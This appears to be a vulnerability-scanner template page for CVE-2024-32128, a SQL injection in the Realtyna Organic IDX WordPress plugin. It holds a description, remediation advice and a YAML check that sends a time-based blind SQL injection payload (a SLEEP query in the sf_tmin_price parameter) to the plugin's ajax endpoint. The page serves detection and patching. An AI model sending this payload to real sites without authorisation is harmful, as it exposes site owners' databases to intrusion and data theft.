WordPress Realtyna Organic IDX Plugin <= 4.14.4 - SQL Injection
CVE-2024-32128
Verified
Description
The Realtyna Organic IDX plugin plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 4.14.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Severity
Critical
Published Date
February 6, 2026
Template Author
shivam kamboj
CVE-2024-32128.yaml
id: CVE-2024-32128
info:
name: WordPress Realtyna Organic IDX Plugin <= 4.14.4 - SQL Injection
author: Shivam Kamboj
severity: critical
description: |
The Realtyna Organic IDX plugin plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 4.14.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
remediation: |
Update to the latest version of the plugin, version 4.14.5 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-32128
- https://patchstack.com/database/wordpress/plugin/real-estate-listing-realtyna-wpl/vulnerabilities
metadata:
verified: true
max-request: 2
publicwww-query: "/plugins/real-estate-listing-realtyna-wpl"
tags: cve,cve2024,wordpress,wp-plugin,sqli,realtyna,wp,real-estate-listing-realtyna-wpl
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /?wpl_format=f:property_listing:ajax&wpl_function=get_total_results&sf_tmin_price=1 HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
redirects: true
matchers:
- type: dsl
dsl:
- 'contains(body_1, "real-estate-listing-realtyna-wpl")'
- 'contains_any(body_2, "\"success\":1", "\"total\":")'
- 'status_code_2 == 200'
condition: and
internal: true
- raw:
- |
@timeout: 30s
GET /?wpl_format=f:property_listing:ajax&wpl_function=get_total_results&sf_tmin_price=1%20AND%20(SELECT%201%20FROM%20(SELECT%20SLEEP(8))x) HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
matchers:
- type: dsl
dsl:
- 'duration>=8'
- 'status_code == 200'
- 'contains_any(body, "\"success\":1", "\"total\":")'
condition: and
# digest: 4a0a00473045022100f37341fbf0910c696672ad6e2b4c62222eb344650201a7ab38aca4954d531476022076e68451d355cfba130d16876fe70617a293e2e8c5cd0f348e1f08dfcd9b0d55:922c64590222798bb761d5b6d8e72950Remediation Steps
Update to the latest version of the plugin, version 4.14.5 or later.